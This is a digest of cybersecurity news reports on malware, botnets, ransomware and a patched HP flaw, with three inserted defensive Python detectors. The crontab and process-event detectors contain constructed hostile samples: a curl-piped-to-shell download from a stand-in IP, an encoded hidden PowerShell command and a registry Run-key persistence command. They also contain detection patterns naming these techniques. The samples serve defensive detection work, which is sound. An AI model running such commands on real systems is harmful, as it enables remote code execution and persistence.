
HP Patches a Critical Vulnerability Targeting Windows PCs


Security research firm SafeBreach recently discovered a critical privilege-escalation vulnerability in the Open Hardware Monitor tool that can be used to compromise Windows PCs running software that depends on it.

HP has already issued a patch fixing the flaw after it was reported to them.

One of the most widely distributed bundled products that uses Open Hardware Monitor is HP TouchPoint Analytics, a tool that runs on many HP laptops and desktops around the world, putting a similarly large number of customers at risk. Tools such as HP TouchPoint Analytics are loaded as signed services and are therefore whitelisted by many anti-malware products, which is most likely one of the main reasons the flaw is described as 'potentially critical'.

HP laptops and desktops are used not only for personal computing but also widely in enterprises that handle potentially very sensitive data, which makes the disclosure all the more serious: through this privilege escalation, attackers could target IT administrator setups, get onto specific machines, load 'arbitrary and malicious' DLL files into the system, take control of the machines in question and thereby reach highly sensitive data.

In this case, the HP TouchPoint Analytics tool had root-level (SYSTEM) access, and because it is a whitelisted tool, it let attackers escalate to 'system privilege' and reach critical parts of the system. Potential use cases for attackers include "data theft, undetected tracking of users and critical surveillance activities."

"These types of vulnerabilities are alarming because they indicate the ease with which malicious hackers could mount supply-chain attacks targeting and breaching highly trusted elements of our software ecosystem. This should be a clear signal to security teams that they need to increase their frequency of testing and analysis of their security envelope, in order to match the pace of criminals who are constantly innovating ways to hack into the most vulnerable parts of IT systems," said Itzik Kotler, co-founder and chief technology officer of SafeBreach.

The flaw has since been patched by HP, although SafeBreach warns that any other organization using the Open Hardware Monitor tool may still be at risk.


Smominru Botnet Affecting Over 4,000 Windows Systems Every Day


Affecting Windows machines across the globe, Smominru has been labeled one of the most rapidly spreading botnets, according to a report by data center and cloud security company Guardicore Labs. The report puts its infection rate at up to 47,000 machines per day; in August alone it compromised almost 90,000 computers.

Smominru compromises Windows PCs using the NSA exploit EternalBlue and by brute-forcing services such as RDP, Telnet and MS-SQL. The malware is configured to steal the target's credentials and then install a cryptominer and a Trojan module to compromise the network. After establishing a foothold, it moves laterally to infect as many systems as it can inside the targeted organization.

Reportedly, the US, Russia, China, Taiwan and Brazil saw the highest number of attacks; however, other countries remain equally vulnerable to the malware, which has seen an upsurge recently. The largest network compromised by Smominru was a healthcare provider in Italy, where 65 hosts were affected.

The indiscriminate, non-targeted nature of the attacks was notable: the compromised networks ranged from medical firms to higher-education institutions, and the victims even included cybersecurity companies.

Around 85% of the attacks were found to target Windows 7 and Windows Server 2008 systems, while others were observed on Windows XP, Windows Server 2012 and Windows Server 2003.

Seemingly, the failure of administrators to patch their networks and servers in time is one of the primary reasons for the compromises. For many organizations the inability stems from limited resources, but for others it is simply negligence and a failure to keep up with the sector's requirements.

Experts found a fraudulent network that infected about 800,000 Android phones in the Russian Federation


A large-scale hacker attack was discovered, whose victims were about 800,000 smartphones in Russia. The criminals managed to gain access to several million euros in the bank accounts of Russians.

Avast specialists determined that the Russian smartphones were attacked by a banking botnet that collects information and personal data. Infections have been occurring since 2016.

It turned out that all infected devices were connected to Geost. As a result, attackers were able to remotely control the devices and could send and receive SMS messages. The malicious program was disguised as various banking and social media applications, so victims downloaded it easily. The main targets of the Trojan were five banks located in Russia and Android devices.

The Geost botnet used 13 command-and-control servers to run hundreds of malicious domains. It could be exposed because of a mistake by the scammers: they used a proxy network created by the HtBot malware, in which traffic was not encrypted, so experts were able to find the criminals' private correspondence, which mentioned money laundering.

According to Avast employee Anna Shirokova, the company gained access to the cybercriminals' correspondence and malware. "We got a really unprecedented idea of how such groups work," Shirokova said. In total, experts studied eight months of correspondence involving 29 of the attackers.

The exact amount stolen was not disclosed. Avast also did not specify who exactly was involved in creating the botnet.

According to researchers, the Geost botnet could control several billion rubles in the accounts of victims.

Earlier, E Hacking News reported that the international company Group-IB had recorded a new Android Trojan campaign whose victims are customers of 70 banks, payment systems and web wallets in the Russian Federation and the CIS. The potential damage from the Trojan, called FANTA, amounted to at least 35 million rubles ($547,000). According to the company, the Trojan is aimed in particular at users who place purchase and sale advertisements on the Russian classified advertisements website Avito.

US: Fake News and Hike in Malicious Campaigns



'The internet is stacked with fake news sites in the present times,' says research by DomainTools, a security analytics company. The company scrutinized some of the top US news sites and examined their vulnerability to URL hijacking and false domains. The false URLs may spread misinformation and harmful malware, according to the study. “As skepticism of traditional media continues to rise, defending the society from fake news attacks has grown relevant to the constitutional process,” says Corin Imai, a security advisor at DomainTools.

Fake news has recently attacked the credibility of news and raised questions about professional journalism. Media coverage today is full of falsehoods and misinformation, and mainstream news sites can largely be held responsible for spreading fake news among the general public.

Why should one pay attention to fake news sites? 

'It’s no mystery that since recent times fake news campaigns are on a hike,' says Imai. 'The research shows that various top news websites' domain names have been tricked, and are vulnerable to URL hacking.' Honesty and assurance are the pillars of excellent customer service. The study by DomainTools reveals how malicious actors use tricks such as typosquatting and domain spoofing to run fake news campaigns.

Typosquatting, also called URL hijacking, is a technique that relies on internet users accidentally mistyping a domain while looking for a news site in their browser. Spoofing, by contrast, is when a fraudster poses as the genuine publisher of a news site. These unlawful actions can result in theft of user data, circulation of fake news via spoofed news sites, and downloads of dangerous malware onto the user's system.
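The monitoring side of the typosquatting problem described above can be automated: a defender enumerates the common typo variants of a legitimate domain (dropped letters, swapped neighbours, look-alike characters, wrong TLD) and checks newly observed domains against that set. The following is an added example and not DomainTools' own tooling; the brand domain and the list of "observed" domains are constructed for illustration, and the code assumes a single-label second-level domain such as `brand.com`.

```python
"""Generate typosquat candidates for a publisher's domain and flag observed
domains that match (added example, not DomainTools' code; sample data is
constructed)."""

# Hypothetical publisher domain and a constructed list of domains seen in
# DNS or proxy logs; none of these are real sites.
LEGIT_DOMAINS = ["examplenews.com"]
OBSERVED = [
    "examplenews.com",    # the genuine site
    "examplenwes.com",    # transposed letters
    "examp1enews.com",    # digit one in place of 'l'
    "examplenews.co",     # wrong TLD
    "unrelated-site.org", # benign, unrelated
    "exarnplenews.com",   # 'rn' imitating 'm'
]

# Visually confusable substitutions commonly used in look-alike domains.
HOMOGLYPHS = {"l": "1", "i": "1", "o": "0", "m": "rn", "w": "vv", "e": "3"}
ALT_TLDS = ("co", "net", "org", "cm")


def typosquat_variants(domain):
    """Return the set of plausible typo/look-alike variants of `domain`."""
    name, _, tld = domain.partition(".")  # assumes name.tld layout
    names = set()
    # 1. single-character omission (examplnews)
    for i in range(len(name)):
        names.add(name[:i] + name[i + 1:])
    # 2. adjacent-character transposition (examplenwes)
    for i in range(len(name) - 1):
        names.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    # 3. homoglyph substitution (examp1enews, exarnplenews)
    for i, ch in enumerate(name):
        if ch in HOMOGLYPHS:
            names.add(name[:i] + HOMOGLYPHS[ch] + name[i + 1:])
    variants = {n + "." + tld for n in names}
    # 4. same name under a different TLD (examplenews.co)
    variants.update(name + "." + alt for alt in ALT_TLDS if alt != tld)
    variants.discard(domain)
    return variants


def find_lookalikes(legit, observed):
    """Map each legitimate domain to the observed domains that look like it."""
    hits = {}
    for good in legit:
        variants = typosquat_variants(good)
        for seen in observed:
            if seen != good and seen in variants:
                hits.setdefault(good, []).append(seen)
    return hits


if __name__ == "__main__":
    for good, bad in find_lookalikes(LEGIT_DOMAINS, OBSERVED).items():
        print(good, "look-alikes:", ", ".join(bad))
```

Candidate generation is cheap, so in practice the variant set is computed once per brand and compared against a daily feed of newly registered domains or against the destination hosts in proxy logs; a match is a lead for further review rather than proof of abuse.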

How to identify misinformation campaigns and stay safe from fake news sites- 

Fake news sites often exploit users' browsing habits by impersonating their favored source of information. This can lead to data theft or exposure to fake news and malware.
Steps to avoid fake news-

• Beware of suspicious or doubtful domain names. Always pay attention to whether the web search is correct.
• Bookmark your preferred news site. This helps avoid typos when searching for a news site.
• Visit the news website directly; avoid clicking on links that lead to news or information.
• Be digitally literate. Stay up to date with the latest trends and technologies happening over the internet.

By following these basic precautions, one can be safe from the risk of fake news.

Google Takes Down Around 46 Apps by Chinese Developers from its Play Store


Last week, Google removed around 46 apps by the Chinese developer iHandy from its Play Store. Initially, Google declined to give reasons for the sudden removal of the various security, horoscope, selfie, health and antivirus apps, which had been downloaded millions of times.

However, a total of eight apps were still present on Google’s Play Store, until three more were taken down, according to a BuzzFeed report. The Chinese company, established in 2008, claims almost 180 million monthly active users in more than 200 countries across the globe. iHandy, currently under investigation, is one of the world’s largest mobile application developers.

In a conversation with Buzzfeed, iHandy VP Simon Zhu, while expressing how they found Google’s takedown quite unexpected, said “It is an unexpected action from our point of view. We are trying to find out the reasons. Hope the apps will be back to Play Store as soon as possible.”

Notably, Google has removed apps by Chinese developers in the past as well, for various reasons; in this case, the removal was triggered by deceptive and disruptive ads. In August this year, after Trend Micro discovered malware inside certain apps, Google removed a total of 85 apps from its Play Store; most of these apps were related to gaming or photography and had more than 8 million downloads. The most popular names among these infected apps included ‘Super Selfie’, ‘Cos Camera’, ‘One Stroke Line Puzzle’ and ‘Pop Camera’.

For example, the very popular app ‘Sweet Camera- Selfie Beauty Camera, Filters’, which had over 50 million downloads, was also removed and is no longer available on the Indian Play Store either.

Researchers discovered that all of these infected apps were uploaded to the Play Store via distinct developer accounts and signed with different digital certificates, but they exhibited the same behaviour and shared similar code.

Google’s spokesperson stated: "Our Google Play developer policies are designed to help create the best experience for users, and we explicitly prohibit deceptive or disruptive ads. When violations are found, we take action."

Avito users were targeted by a dangerous Android Trojan


International company Group-IB, which specializes in the prevention of cyber attacks, has recorded a new Android Trojan campaign whose victims are customers of 70 banks, payment systems and web wallets in the Russian Federation and the CIS. The potential damage from the Trojan, called FANTA, amounted to at least 35 million rubles ($547,000).

FANTA belongs to the Flexnet malware family, which has been known to experts since 2015 and studied in detail. The Trojan and its associated infrastructure are constantly evolving: attackers are developing more effective distribution schemes and adding new functionality to steal money from infected devices more effectively and bypass security measures.

According to the company, the Trojan is aimed, in particular, at users who place purchase and sale advertisements on a Russian classified advertisements website Avito.

Attackers find sellers' contact details online, and after a while the victim receives a personalised SMS about the transfer of the full price of the goods to their account. The message contains a link where the seller can supposedly find the payment details. The link opens a phishing page imitating the Avito website, which notifies the seller of the purchase and shows a description of the goods and the amount received from the sale. After clicking the "Continue" button, the FANTA malware, disguised as the Avito application, is downloaded to the phone.

"The receipt of bank card data is carried out in the standard way for Android Trojans: the user opens a phishing site disguised as a legitimate mobile banking application, where the victim enters their bank card details," Group-IB said, describing the attackers' scheme.

Moreover, FANTA analyzes which apps are running on the infected device. Experts found that in addition to displaying prepared phishing pages, FANTA also reads the text of notifications from about 70 banking applications, fast payment systems and e-wallets. In addition, an important feature of FANTA, to which its creators paid special attention, is bypassing anti-virus tools.

According to Group-IB, the latest attack was aimed at Russian-speaking users; most of the infected devices are located in Russia, with a smaller share in Ukraine, Kazakhstan and Belarus.
Interestingly, FANTA's developers are able to target users of about 30 different Internet services, such as AliExpress, Youla, Pandao, Aviasales, Booking and Trivago, as well as taxi and car-sharing services.

Earlier, another Russian free-classifieds service, Youla, stated that it plans to completely remove the display of phone numbers, keeping all communications within the service.

Skidmap, Linux Malware Mining Cryptocurrency in Disguise



Security researchers have discovered a new strain of Linux malware that is configured to carry out a multitude of malicious activities beyond illegally mining cryptocurrency; by using a "secret master password" it gives attackers universal access to the system.

Skidmap demonstrates the increasing sophistication of cryptocurrency-mining malware and the prevalence of the corresponding threats.

To mine cryptocurrency in disguise, Skidmap forges CPU-related statistics and network traffic, according to Trend Micro's recent blog post on the subject.

Highlighting the advanced methods used by Skidmap, researchers at Trend Micro said, "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware."

“Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” reads the blog.

How does the infection take place?

It starts with crontab, the standard utility for scheduling periodic tasks on Unix-like systems. Skidmap then installs various malicious binaries and lowers the security settings of the affected machine so that cryptocurrency mining can start smoothly.

While the cryptocurrency miners generate digital money for the attackers, additional binaries placed on the system monitor them.
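Because the infection chain above begins with a scheduled task, a crontab audit is a practical first check for administrators. The following is an added example, not Trend Micro's tooling or Skidmap's actual crontab entries: it parses user-crontab text (no user field) and flags entries with traits that are typical of cryptominer persistence, such as a download piped straight into a shell, binaries run from world-writable directories, hidden path components, runtime base64 decoding, and every-minute schedules. The sample crontab and the IP address in it are constructed.

```python
"""Audit crontab text for entries typical of miner/dropper persistence
(added example; the sample crontab below is constructed, not Skidmap's)."""
import re

SAMPLE_CRONTAB = """\
# constructed sample for illustration
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 2 * * * /usr/bin/apt-get update -qq
*/10 * * * * curl -fsSL http://198.51.100.10/pm.sh | sh
* * * * * /tmp/.x/miner --quiet
30 3 * * 0 echo aGVsbG8K | base64 -d | sh
@reboot /usr/local/bin/backup.sh
"""

# Each indicator is a human-readable reason plus a regex over one crontab line.
INDICATORS = [
    ("download piped to shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("runs from world-writable dir", re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/")),
    ("hidden path component", re.compile(r"/\.[^/\s]+")),
    ("base64 decoded at runtime", re.compile(r"base64\s+(-d|--decode)\b")),
    ("runs every minute", re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
]

ENV_ASSIGNMENT = re.compile(r"^[A-Z_][A-Z0-9_]*=")


def audit_crontab(text):
    """Return [(line, [reasons...])] for every scheduled entry that trips an indicator."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and environment assignments (SHELL=, PATH=, ...).
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        reasons = [name for name, rx in INDICATORS if rx.search(line)]
        if reasons:
            findings.append((line, reasons))
    return findings


if __name__ == "__main__":
    # On a live host, feed the output of `crontab -l` (per user) and the
    # contents of /etc/cron.d/* through the same function.
    for line, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{'; '.join(reasons):45s} <- {line}")
```

The indicators are deliberately coarse: a legitimate backup job can live in `/var/tmp`, and a flagged line is a lead to inspect, not a verdict. Since Skidmap also ships LKM rootkits that can hide files and processes, an audit from inside a suspect host should be cross-checked against a copy of the cron files taken from a clean boot or a mounted disk image.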

To stay guarded against this cryptocurrency-mining malware, administrators are advised to keep their servers and machines updated and patched, and to be wary of unverified repositories.

Beware: Malware Hidden Inside Online School Textbooks?




Security experts have warned users to be aware of malware disguised as online versions of textbooks. Thousands of textbooks were found to be affected by this technique.

This scam exploits the habits of online shoppers and people who look for everything online: to cut costs, people try to download or buy textbooks online.

Over 350,000 attacks via this technique have already been registered. Potentially unwanted files are also disguised as ready-made essays and textbooks.

Per sources, over 2,000 of these disguised books were English textbooks, around 1,200 were mathematics textbooks and more than 850 were literature books.

The books were a cover for various threats, ranging from not-so-serious adware or “unrequested software” to highly severe malware.

Students looking for cheap or even free textbooks for university or school are the main target, and their searches create openings for cybercriminals.

This is a serious issue because if this or any other severe threat were to enter a school’s network via these disguised books, a lot of people would be compromised.

Students and schools should be cyber-aware and make sure they don’t download any unauthenticated file from an illegitimate source just because it’s free.

Install anti-virus software, stay strict about security, steer clear of unknown email senders and try not to rely so heavily on online sources.

ATTENTION ANDROID USERS: REMOVE THESE APPS IMMEDIATELY!




At least 24 extremely popular Android applications were found to be infected with malware. They tested positive for a Trojan known as “Joker”.

Per sources, this Trojan makes the device interact with advertisement websites. It can steal SMS messages and private data.

As per the sources, the following applications are said to be infected with the Trojan:
  • Beach Camera 4.2
  • Mini Camera 1.0.2
  • Soby Camera 1.0.1
  • Declare Message 10.02
  • Rapid Face Scanner 10.02
  • Leaf Face Scanner 1.0.3
  • Spark Wallpaper 1.1.11
  • Humour Camera 1.1.5
  • Rudy SMS Mod
  • Antivirus Security – Security Scan, App Lock 1.1.2
  • Collate Face Scanner 1.1.2
  • Ignite Clean 7.3
  • Advocate Wallpaper 1.1.9
  • Print Plan scan 1.03
  • Great VPN 2.0
  • Climate SMS 3.5
  • Dazzle Wallpaper 1.0.1
  • Cute Camera 1.04
  • Board Picture editing 1.1.2
  • Altar Message 1.5
  • Age Face 1.1.2
  • Reward Clean 1.1.6
  • Certain Wallpaper 1.02
  • Mini Camera 1.0.2

Security researchers strongly advise every user to uninstall any of these applications found on their devices.

Ransomware Attack Locks the Internet Service in Public Schools of Rockford





Due to a ransomware attack, the public schools in Rockford, Illinois are working without internet service; both phone and computer systems have been affected.

The schools first experienced problems with their phone and internet services on Friday, yet classes for around 28,000 students in 47 schools resumed by Monday despite outages still affecting the school buildings and the nearby district offices.

The ransomware identified is a kind of malware, or malicious software, commonly spread through emails containing links or attachments, that encrypts a user's documents or systems and prevents them from accessing the data.

In a statement on Monday, school officials said that experts are helping the district's technology team assess the outage. The district says its officials are trying to get a 'complete picture' of the incident and understand how it affects its data.

However, it has not been disclosed whom the school district is working with to find the root cause of the problem, or whether it is working with local, state or federal law enforcement agencies.

Hackers hiding malware behind Captcha







Hackers are hiding malware behind CAPTCHAs to evade email security gateways. This technique helps attackers establish the apparent authenticity of the email.

Hackers use various social engineering methods to trick users into trusting them.

A new email campaign, sent from an address at @avis.ne.jp, alerts recipients that they have received a voice message. The attached voice preview tempts users to listen to the full message.

The email contains a play button that directs users to a page containing a CAPTCHA; this step is meant to bypass automated analysis tools and secure email gateways, which cannot solve the CAPTCHA to reach the page behind it.

The malicious page asks users to select a Microsoft account to log in; when the victim logs in, all their credentials are captured.

“Both pages are legitimate Microsoft top-level domains, so when checking these against domain reputation databases we receive a false negative and the pages come back as safe,” reads the Cofense report.

Before clicking any link in an email, the user should check whether the website is safe.


CamScanner Returns After Being Removed by Google for Having Malware



Researchers at the multinational cybersecurity company Kaspersky Labs discovered a malicious module in the widely used mobile scanning app CamScanner. As a result, Google removed the app from its Play Store last week. The iOS version of the app seemingly remained unaffected by the malware.

On 5 September 2019, the developers of the popular PDF creator app announced its comeback on their official Twitter handle. Reportedly, they have removed all advertising SDKs in the latest version of CamScanner, version 5.12.5, which users can download from the Google Play Store.

There were issues in the previous version of the app; however, CamScanner itself is a legitimate and widely used application.



According to the researchers at Kaspersky Labs, “Recent versions of the app shipped with an advertising library containing a malicious module.”

“The module is a Trojan-Dropper, which means the module extracts and runs another malicious module from an encrypted file included in the app’s resources. This “dropped” malware, in turn, is a Trojan-Downloader that downloads more malicious modules depending on what its creators are up to at the moment,” they added.

The Trojan-Dropper module, called “Trojan-Dropper.AndroidOS.Necro.n”, is configured to trick users into signing up for paid subscriptions by showing them intrusive advertisements.

Resurgence in Ransomware Being Driven By a Surge of New Malware Families


A US-based cybersecurity firm, in its most recent threat report, observed a 118% increase in new ransomware strains in the first quarter of 2019 compared with the last quarter of 2018. It believes the resurgence in ransomware is being driven by a flood of new malware families that are increasingly targeted.

The firm found that attackers were targeting governments and organizations, followed by companies in the financial, chemical, defence and education sectors. Its data corresponded with an ever-growing number of ransomware attacks making headlines, especially against US governments and municipalities, much like the Texas ransomware attack.

This new spate of ransomware attacks is said to mark a move away from 'spray and pray' ransomware strategies; in such targeted attacks, spear phishing (sending malicious emails from an "apparently trusted person") is increasingly used to gain initial access, 68% of the time.

Attackers are also said to be using anonymous email services to manage the ransomware campaigns. The most widely seen ransomware families during this period were Dharma (also known as Crysis), GandCrab and Ryuk.

McAfee made other notable disclosures as well. First, the cybersecurity firm found that criminals are turning to varied attack approaches for coin-mining malware, such as the CookieMiner malware targeting Apple users.

Furthermore, it found an average of 504 'new threats per minute' in the first quarter of 2019 and noted that more than 2.2 billion stolen account credentials were made available on the cybercriminal underground during the same period.

Its findings are based on data gathered from its Global Threat Intelligence cloud, which comprises over a billion sensors monitoring various kinds of cyber threats around the globe.

Raj Samani, McAfee fellow and chief scientist, stresses that the impact of these threats is very real, adding that “It’s important to recognise that the numbers, highlighting increases or decreases of certain types of attacks, only tell a fraction of the story. Every infection is another business dealing with outages, or a consumer-facing major fraud. And we must not forget that for every cyber-attack, there is a human cost.”

Google Project Zero Discovers Malicious Website Exploits which Affected iPhone Users



Researchers at Google Project Zero discovered an attack against iOS users in the form of malware delivered through hacked websites.

The malware silently installs itself on the devices of users who visit any of the hacked websites, which have a readership of thousands.

Once installed, the malware turns the iPhone into a clandestine spying device that tracks contacts, location and messages, giving hackers an overview of the victim's life and habits.

The malware extends its data collection to popular third-party apps such as Gmail, WhatsApp and Google Maps; it is configured to steal files and upload the owner's live location data.

Google's Project Zero division, a team of white-hat hackers that has discovered many bugs and vulnerabilities, said these attacks are based on a series of hacked sites that were indiscriminately distributing malware to iOS users.

This series of attacks stands out because most such attacks are narrowly targeted, whereas these affected anyone who happened to visit one of the hacked websites.

Explaining the issue, Ian Beer of Project Zero says, "Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group.

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them."

Hacking Attack Neutralized: France



A recent hacking attack, in which 850,000 computers had been taken control of, was neutralized by the French government. The malware has been removed from the infected devices.

According to sources, a software worm called Retadup was responsible for taking over the devices, and the operation was run from the Paris region.

The massive number of infected computers indicates that it was a gigantic operation on the part of the hackers.

Police created a copy of the server responsible for the attack, which had allowed the hackers to get into systems and take control.

Owners of all the infected computers were advised to uninstall the Retadup malware, which according to researchers was involved in mining the Monero cryptocurrency.

A few suggestions made by the researchers to ensure safety against malware attacks included:
·       Don’t open emails from unknown senders.
·       Don’t click attachments that pretend to offer anti-viruses for free.
·       Install and activate anti-virus software immediately.

Windows Users Beware of the “Complete Control” Hack Attack; Update Imperative!





A common design flaw in Microsoft Windows hardware device drivers left users' entire systems exposed to a recently revived Remote Access Trojan (RAT).

The RAT has resurfaced as a hacking tool in a modified form which, as it turns out, is absolutely free of cost.

The NanoCore RAT, as it is called, has been circulating on the dark web for quite some time now. It was initially sold for $25, a minimal amount for a Windows hacking tool.

NanoCore’s cracked version caused quite a commotion among researchers and hackers as soon as it appeared.

Initially the “premium plugins” were paid-for privileges, but the latest cracked version has it all for free.

The NanoCore coder was arrested given the rising popularity of the product and the fact that he was part of cybercrime.
Despite that, NanoCore thrived and spawned other tool variants: RAT, Surprise Ransomware, LuminosityLink and, of course, the free “highly modified” latest version.

According to researchers, the NanoCore RAT is protected by only simple security measures, has no particular entry barriers and offers a really uncomplicated interface that aids even novice hackers.

There was an outburst of campaigns using the malware, whose capabilities include:
·       Remote shutdown and restart of Windows systems
·       Remote file browsing on the infected system
·       Access and control of Task Manager, mouse and Registry editor
·       Disabling webcam lights to spy
·       Taking over open webpages
·       Recovering passwords and obtaining credentials
·       Remotely operated “locker” for encryption

Owing to NanoCore's long presence, the techniques it uses are well known to researchers. Scripting, registry keys and malicious attachments are the three main categories researchers identified.


The basic answer to the scripting threat is to check Microsoft Office files for macro code and to watch for “anomalous execution” of legitimate scripting programs like PowerShell or Wscript.

Registry keys should be monitored during update and patch cycles, and rigorous security controls should be put in place for behavioural detection.
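The two detection ideas above (anomalous execution of PowerShell or Wscript, and watching registry keys) can be expressed as simple rules over process-creation telemetry. The following is an added example, not code from the researchers or from any product the page mentions: it reads constructed JSON-lines events with `parent`, `image` and `cmd` fields (a layout assumed for the example, not any vendor's schema) and flags an Office application spawning a script host, an encoded PowerShell command line, and a command that writes an autorun `Run`/`RunOnce` registry key. The file paths and commands in the sample are constructed.

```python
"""Rule-based detection over process-creation events (added example; the
JSON-lines schema and the sample events are constructed, not vendor telemetry)."""
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Autorun persistence keys under HKCU/HKLM ...\CurrentVersion\Run and RunOnce.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
# PowerShell accepts abbreviated switches, so -e, -ec, -enc all mean -EncodedCommand.
ENC_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)

# Constructed sample events, one JSON object per line.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"parent": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE",
     "image": "C:\\Windows\\System32\\wscript.exe",
     "cmd": "wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\inv.vbs"},
    {"parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmd": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
            "/v upd /t REG_SZ /d C:\\Users\\bob\\AppData\\Roaming\\upd.exe"},
    {"parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},
])


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names that match one process-creation event."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmd"]
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office app spawned script host")
    if image in {"powershell.exe", "pwsh.exe"} and ENC_FLAG.search(cmd):
        reasons.append("encoded PowerShell command")
    if RUN_KEY.search(cmd):
        reasons.append("writes autorun registry key")
    return reasons


def scan(jsonl):
    """Return [(image name, [reasons...])] for every event that matches a rule."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            alerts.append((basename(event["image"]), reasons))
    return alerts


if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(f"{image:16s} {'; '.join(reasons)}")
```

The parent/child rule is the one that carries most of the weight: an Office process launching PowerShell or Wscript is rare in normal use, so even a single such event is worth a look, while the encoded-command and registry rules on their own produce more benign hits and are best used to enrich an alert rather than raise one.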

Windows users should update their systems immediately and make sure all their applications are running as they should.

Additionally, Windows 10, 8.1 and 7 users should especially keep a keen check on regular updates and patching!

State of Texas Hit By a Ransomware Attack; 23 Agencies Shut Down!





The state of Texas was recently hit by a cyber-attack, as a result of which 23 government agencies were taken offline.

Per the Texas Department of Information Resources (DIR), most of the affected parties were small local government agencies, which remain unnamed so far.

Texas state networks, however, are still unharmed. The State Operations Center has been working rigorously on the problem.

Sources say that all the state and federal agencies handling the case indicate the attack was coordinated by a single actor.

The attack has been categorized as a definite ransomware attack. Per sources, it was a strain identified as “Nemucod”.

The aforementioned ransomware generally “encrypts files and then at the end adds the .JSE extension”, a researcher mentioned.

Allegedly, the US has been the target of many cyber-attacks of late. With an apparent 53% of the global total, the US has been victimized by cyber-attacks more than any other country.

A state of emergency was declared in Louisiana in July this year in response to a ransomware attack on school computer systems.

From a cyber-security standpoint the situation is critical, as municipalities falling prey to such attacks, and to ransomware in particular, is not a good sign at all.

Mass-scale attacks and their increasing number are disconcerting on many levels, because, as the researchers like to say, threat actors willing to put in this much effort are numerous.

Indian Army detected a Malware

Ahead of Independence Day celebrations, the Indian Army has detected a cybersecurity breach which affected a senior officer posted in Jammu and Kashmir under the Northern Command.

"The cybersecurity breach was detected by the Indian Army personnel during a routine check when malware was found in the computer of a senior officer," army sources told ANI.

An investigation has been started into how the malware found its way onto his computer.

Senior Army officers are issued a computer by the Army for all official work, and the system is connected to the Army intranet.

The Army regularly alerts its personnel about cyber threats and data theft via WhatsApp and other social media platforms. They are also warned against using any Chinese apps.

Recently, Pakistani intelligence agencies have targeted Army personnel by sending them malicious links which, once clicked, download malware onto their computers or mobile devices and steal all their information.

To avert this kind of malware and other threats, the Army has been issuing regular warnings and asks its personnel to immediately inform higher authorities if they have even the slightest doubt about their data.

The Army has been issuing regular warnings about these issues and has asked personnel to stay alert when dealing with them.

The Udhampur-based battalion is responsible for handling almost the entire territory of Jammu and Kashmir and Ladakh bordering both Pakistan and China.

Malware records video once pornographic websites are visited

ESET’s security researchers last week disclosed the discovery of new malware that is being used predominantly for online extortion.

The malware, popularly called “Varenyky” (the name given by its discoverer), watches the activity of the infected computer until a pornographic website is visited and then starts recording the screen; the video is later used for blackmail and extortion.

Varenyky was first discovered in May in France, according to ESET's reports, and is designed to target French computer users.

The malware arrives as malicious code in fake email attachments posing as invoices in Microsoft Word format. The macro in the attachment first checks that the user is French; if the targeted computer ticks its boxes, Varenyky determines which components need to be downloaded to the target computer, then executes macros that install software which can steal passwords and spy on the target system.

The moment the target computer visits a site matching trigger keywords such as “YouPorn, Pornhub, Brazzers”, Varenyky starts recording the screen using an FFmpeg executable; the video is then uploaded to the C&C server.

The risks involve blackmail and sextortion. While current reports suggest the malware is relatively generic and is meant to target French computer users, it could potentially be used against other individuals in future.

SystemBC: Another Malware On The Dark Web!

A fresh malware being advertised on the dark web is SystemBC, which installs SOCKS5 proxies on infected systems and pushes other malware through them.

The malware has been advertised since April and made its first appearance in May, according to sources.

Per sources, it is being distributed as part of the Fallout and RIG exploit kits, web-based toolkits that exploit browser vulnerabilities to install malware.

To trick users into installing the malware, these exploit kits also serve malicious web pages.

Previously undocumented, SystemBC is mainly an on-demand proxy component for malware operators.

It can be deployed on compromised systems to hide malicious traffic and other malicious activity on the system.

